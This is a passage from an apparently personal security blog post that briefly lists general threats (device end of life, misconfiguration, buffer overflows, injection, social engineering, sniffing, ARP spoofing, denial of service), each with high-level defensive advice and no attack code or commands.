    • Power: Power problems can affect our devices or components, and can destroy or corrupt data or stress our devices.
    • End of life: Every device has a life and at some point it needs to be retired, maybe because it is not powerful enough to match your business requirements or just because it is too old. But almost any of our devices is going to have a hard drive that has been storing our information at some point, and we should take care of this. And I am not talking just about laptops or PCs; I am including printers or any other device that has a hard drive. The wrong treatment of these devices can result in a leak of information.
  • Application threats:
    • Configuration threats: Misconfigurations or default configurations can be a great threat to our devices and our organizations. We should pay attention to everything we configure; it does not matter if it is hardware or software. We should read the manuals properly and even, if necessary, look for some training.
    • Buffer overflows: An application trying to store more information in a buffer than it is intended to hold. This is usually caused by errors during development. Any in-house development should be reviewed carefully, any open source code should be reviewed carefully, and all the scripts or code our developers or IT people copy and paste from the Internet should be reviewed.
    • Data and input validation: All the information coming into our applications needs to be validated first to avoid injection. Code injection, SQL injection, any injection.
  • Human threats: On this point we could write a book, and probably a few of them. The biggest and one of the most dangerous threats is us. We are humans and we are fallible. There is a whole hacking discipline focused on this kind of threat: social engineering, how to obtain from people what you need. We need to train our people, we need to have policies and mitigation measures, and we need to be prepared; there is no other way.
  • Network threats:
    • Sniffing and eavesdropping: Anyone can be sniffing on your network trying to obtain information to perform an attack.
    • ARP spoofing: Making the attacker’s computer pretend to be the default gateway or any other interesting computer on your network.
    • Denial of Service: Yes, here we have this threat again.

This is just a list of some general threats we can find around us all the time, and something we need to take care of when we are auditing our systems or trying to penetrate them. I hope it is useful, at least, to have them all in the same place to review.

See you.
